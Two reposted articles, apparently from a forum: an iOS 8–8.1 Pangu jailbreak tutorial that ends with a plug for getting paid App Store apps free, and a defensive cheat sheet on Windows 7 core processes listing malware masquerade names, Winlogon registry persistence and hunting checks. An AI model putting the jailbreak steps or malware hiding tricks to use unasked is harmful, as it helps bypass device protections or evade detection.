Untethered iPhone 6 Plus, 6, 5S, iPad Air 2, Mini 3, 4 And iPod Touch This guide will assist you in not only jailbreaking iOS 8.x, but also installing Cydia in an all-new, one-shot method employing the use of the Pangu Team’s updated Pangu 1.1 utility. As previously stated, the newest iteration of the Pangu jailbreak 8.1 utility supports the following iDevice models running iOS 8 through 8.1: iPhone 6 Plus iPhone 6 iPhone 5s, 5c, 5, iPhone 4S iPad Air 2, 1 iPad Mini 3, 2, 1 iPad 4, 3, as well as the iPad 2 iPod touch 5th generation Jailbreak iOS 8 – 8.1 Requirements: All iPhone, iPod Touch And iPad Models Before proceeding any further with this , ensure that you have, and complete, the following as all are necessary to ensure the success of an untethered jailbreak on Apple’s latest public firmware(s). Any of the above iDevices running iOS 8 through 8.1 that were not updated through the Setting app’s OTA (over-the-air) update option. If you performed an OTA update, follow the below prerequisite instructions. Also, ensure that your device does not have a passcode set or Find my iPhone enabled, both of which can be set back post jailbreak – this is very important. A Windows-based PC – while Mac OS X isn’t officially supported Pangu should update their utility soon. For the time being, either create a Windows partition using Boot Camp Assistant or setup a virtual machine; numerous tutorials can be found online for either option. The Latest version of iTunes, as well as the all-new 1.1 Pangu Windows jailbreak iOS 8.1 utility, both of which can be found, and downloaded, from the download section below. iOS 8.1 Jailbreak OTA And Prerequisite Instructions, Which Are Crucial Also, as alluded to in the second step, if you updated your device through Apple’s OTA update ability or you want to ensure that you don’t encounter issues (and you prefer to err on the side of caution) follow the below steps to guarantee a successful jailbreak. 1. Plug your device into your computer via USB and initiate a complete backup inside iTunes. 2. Restore to a clean build of iOS 8.1 by clicking the option to perform a restore. 3. Jailbreak 8.1 following this guide and, once you’ve jailbroken successfully, restore from the backup that you created when following the first step. Now, without further ado, we can continue with the steps required to jailbreak iOS 8.1 on any iPhone, iPad or iPod touch that’s able to run the latest firmware. How To Jailbreak 8.1 Untethered With Pangu: All iOS 8 Devices – Written And Video Tutorials Step 1. In addition to, and beyond, Pangu for iOS 8, download the latest version of iTunes from our download section, listed below, to ensure that you’ve obtain genuine Pangu and Apple software, respectively. Step 2. Following your download of Pangu for iOS 8 version 1.1, plug your iPhone, iPad or iPod into your PC via Apple’s standard Lightning USB cable, or 30-pin connector cable for the iPhone 4s and older iPad models. Step 3. Enter Airplane mode, a step that is fundamental to the jailbreak, and click the blue button at the bottom of the Pangu utility to continue on to jailbreak 8.1. Step 4. Conditional - if Pangu gets stuck towards the end of the on-screen progress bar, find the ‘Pangu New’ app on your device’s springboard, launch it and verify the developer. Upon a successful load, the Pangu utility will proceed to jailbreak iOS 8.1 without further interruption. Step 5. Leave your iPhone, iPad or iPod touch connected to your computer, don’t interface with it, and, once your device reboots, you’ll be greeted with a welcome sight in what was previously a blank space on your device’s springboard: Cydia. Congratulations, after following, and completing, five simple and easy-to-unsderstand steps, you’ve successfully jailbroken your iPod touch, iPhone or iPad running iOS 8 through 8.1! Also, while you’re well on your way to enjoying the countless benefits of jailbreaking, avoid the installation of incompatible tweaks, and those that have yet to be updated for support on iOS 8.x, as they’re unquestionably harmful. Jailbreak iOS 8.1 Pangu Download Section: Pangu 1.1 1. Pangu 8.1 Jailbreak download for Windows-based PC users. 2. Apple’s latest iteration of iTunes, which is required for Pangu to recognize your device and, in turn, jailbreak. 3. The iOS 8.1 IPSW, which should be used to restore to if you wish to ensure the success of your jailbreak on iOS 8. Finally, as a concluding note, for those of you interested in earning paid iOS 8.1 App Store apps for Free, we advise checking out FreeAppLife inside of Safari on your iDevice, regardless of its jailbreak status. Thanks for both reading and following our detailed UnTethered jailbreak 8.1 and iOS 8 tutorial. Don’t forget to subscribe to our Jailbreak Evasion 8.1 UnTethered news feed, like us on Facebook, follow us on Twitter and add us on Google+ to be expediently notified when we publish future articles concerning iOS 8.1, new iterations of Apple’s latest firmware, as well as future updates to the Pangu Untethered 8.1 jailbreak utility. Sursa: Easy Jailbreak 8.1 Untethered Tutorial With Cydia - One-Click Pangu

Know your Windows Processes or Die Trying I have been talking with quite a few people lately tasked with “security” inside their organizations and couldn’t help but notice their lack of understanding when it came to Windows process information. I figured if the people I have talked with don’t understand then there are probably a lot more people that don’t understand. I’m guessing quite a few people that consider themselves “experts” as well. I decided to write this post in an effort to help the individuals that may not have the knowledge, free time, training budgets, etc. to explore Windows processes. For about $50 – $75 (few books) and some free time you can learn pretty much everything needed to know about Windows processes. My goal isn’t to dive very deep into each of the processes. I figured a bulleted “cheat sheet” vs. wordy descriptions will be best for my intended audience. The people that want to dive deeper can buy themselves a copy of Windows Internals, 6th Edition Part I and II, fire up Process Explorer/Process Hacker, start reading the great documentation by the Volatility team (references below). Note: The information below focuses on Windows 7 processes as more and more organizations are *finally* starting to migrate away from Windows XP. I wanted to give those folks a head start. Let’s break it down…. Idle and System Created by ntoskrnl.exe via the process manager function, which creates and terminates processes and threads. No visible parent processes System has a static PID of 4 System creates smss.exe There should only be one system process running SMSS – Session Manager First user mode process Parent process is System Base Priority of 11 Username: NT AUTHORITY\SYSTEM Performs delayed file delete/rename changes Loads known dlls Runs from %systemroot%\System32\smss.exe Creates session 0 (OS services) Creates session 1 (User session) Creates csrss and winlogon then exits, which is why they have no parent process and they both have session ids of 1 Runs within session 0 Only one smss.exe process should be running at one time. The second smss.exe process exits, so you will only see the one running in session 0. There can be more sessions if more users are logged on to the system. 0 and 1 are for a single user logged onto the system. CSRSS.EXE – Client/Server Run Windows subsystem process. Base Priority of 13 %SystemRoot%\system32\csrss.exe Username: NT AUTHORITY\SYSTEM Creates/Deletes processes and threads, Temp files, etc. In XP its used to draw text based console windows. Under Windows 7, the conhost process now does that functionality. For example, cmd.exe One csrss process per session Its name is often used by malware to hide on systems (CSSRS.EXE, CSRSSS.EXE, etc.) Runs within session 0 WININIT.EXE – Windows Initialization Process Parent to services.exe (SCM), lsass.exe and lsm.exe Created by smss.exe, but since smss.exe exits there is no parent to WININIT. Base Priority of 13 Username: NT AUTHORITY\SYSTEM %SystemRoot%\system32\wininit.exe Performs user-mode initialization tasks Creates %windir%\temp Runs within session 0 SERVICES.EXE – Service Control Manager Child to WININIT.EXE Parent to services such at svchost.exe, dllhost.exe, taskhost.exe, spoolsv.exe, etc. Services are defined in SYSTEM\CurrentControlSet\Services %SystemRoot%\System32\wininit.exe Username: NT AUTHORITY\SYSTEM Base Priority of 9 Loads a database of services into memory Runs within session 0 There should only be one services.exe process running LSASS.EXE – Local Security Authority Child to WININIT.EXE Only one lsass.exe process %SystemRoot%\System32\lsass.exe Responsible for local security policy to include managing users allowed to login, password policies, writing to the security event log, etc. Often targeted by malware as a means to dump passwords. Also mimicked by malware to hide on a system (lass.exe, lssass.exe, lsasss.exe, etc.). These “fake” names will not be a children of wininit.exe. Base Priority of 9 Username: NT AUTHORITY\SYSTEM Runs within session 0 It should not have child processes SVCHOST.EXE – Service Hosting Process Multiple instances of svchost.exe can/do exist/run %SystemRoot%\System32\svchost.exe Username: Should only be one of three options: NT AUTHORITY\SYSTEM, LOCAL SERVICE, or NETWORK SERVICE Should always have a parent of services.exe Base Priority of 8 Often mimicked (scvhost, svch0st, etc.) When they are mimicked they will not be running as children to services.exe. Command Line: svchost.exe -k <name> -k <name> values should exist within the Software\Microsoft\Windows NT\CurrentVersion\Svchost registry key Often times when malware uses the actual svchost.exe to load their malicious service they will not include -k command line parameters and be running under a username that does not match on of the three listed in bullet 3. They should all be running within session 0 LSM.EXE – Load Session Manager Service Manages the state of terminal server sessions on the local machine. Sends the requests to smss.exe to start new sessions. Child to wininit.exe It should not have child processes Receives logon/off, shell start and termination, connect/disconnects from a session, and lock/unlock desktop I have not personally seen malware try and impersonate LSM.exe, but there is always a first so keep your eyes open. %systemroot%\System32\lsm.exe Base Priority of 8 Username: NT AUTHORITY\SYSTEM Runs within session 0 WINLOGON.EXE – Windows Logon Process No parent process Could have a child process of LogonUI if smartcard, etc. are used to authenticate LogonUI will terminate once the user enters their password. Once password is entered the verification is sent over to LSASS and it’s verified via Active Directory or SAM (the registry hive SAM), which stores local users and group information. Base Priority of 13 Runs within session one Handles interactive user logons/logoffs when SAS keystroke combination is entered (Ctrl+Alt+Delete) Loads Userinit within Software\Microsoft\Windows NT\CurrentVersion\Winlogon The userinit value in the registry should be: Userinit.exe, (note the comma). Malware will sometimes add additional values to this key, which will load malware upon successful logons. Userinit.exe exits once it runs so you wont see this process running when you look. Userinit initializes the user environment. This includes running GPOs and logon scripts. Will run Shell value located at Software\Microsoft\Windows NT\CurrentVersion\Winlogon within the registry. The value of shell should be Explorer.exe. Malware will also use this sometimes to execute malware by adding values. Since Userinit exists this is also why Explorer.exe doesn’t have a parent process. Explorer.exe – AKA Windows Explorer No parent process since Userinit.exe exits The value “Explorer.exe” is stored in shell value within the registry. The registry location is here: Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell Base Priority of 8 Username: The logged on user account. %Systemroot%\Explorer.exe This will contain multiple child processes. Some of you might know this better as, “Windows Explorer” This process is often targeted by malware. Malware will often times inject this process. One indication of this is if Explorer.exe is connecting out to the internet. There are other indicators, but that’s another post. We are keeping it simple here. Let’s sum this post up by creating a simple checklist to review while looking for malicious/suspect process activity. Check the parent/child relationships of processes. Check which users names the processes are running under Check their command line parameters for those processes that use them. Check their digital signatures Check their base priorities Check the location they are being from Check their spellings Leverage memory analysis to detect hidden and/or injected process. Some malware can hide processes by unlinking them (among other ways). Memory analysis is a must these days. When you get comfortable with everything here, dig deeper and check what modules are typically loaded for each process. Check and see if processes that should not be connecting out to the internet are not Check process privileges If wscript.exe process is running check the command line of what it is running. Investigate processes running inside %temp%, root of %appdata%, %localappdata%, recycle bin, etc. If rundll32.exe is running check its command line as well. “Most” legitimate user applications like Adobe, Web browsers, etc. don’t spawn child processes like cmd.exe. If you see this, they should be investigated. Core Windows processes shouldn’t be communicating out to the internet. If you see communication from these processes, dig deeper. Look for suspicious URLs/IPs, check process strings, etc. So yeah, that’s a quick run down. I’m sure I forgot some stuff so just hit me up via email if I missed something, or got something wrong. I’ve been wanting to get this out of my head and on-to paper for quite awhile. I’m working on some IOCs that will incorporate all this. They will be posted here: https://github.com/sysforensics/IOCs If you want to learn more about the “internals” of Windows processes and memory analysis order this book – http://www.amazon.com/gp/product/1118825098 and take the Volatility Memory Analysis course. Enjoy! References: Windows Internals 6th Edition, Part I – http://www.amazon.com/Windows-Internals-Part-Covering-Server%C2%AE/dp/0735648735 Windows Internals 6th Edition, Part II Windows Internals, Part 2 (6th Edition) (Developer Reference): Mark Russinovich, David Solomon, Alex Ionescu: 9780735665873: Amazon.com: Books Windows Exploratory Surgery with Process Hacker by Jason Fossen http://blogs.sans.org/windows-security/files/Process_Hacker_SANS_Jason_Fossen.pdf The Volatility team and their Documentation https://code.google.com/p/volatility/ Volatility Labs Sursa: https://sysforensics.org/2014/01/know-your-windows-processes.html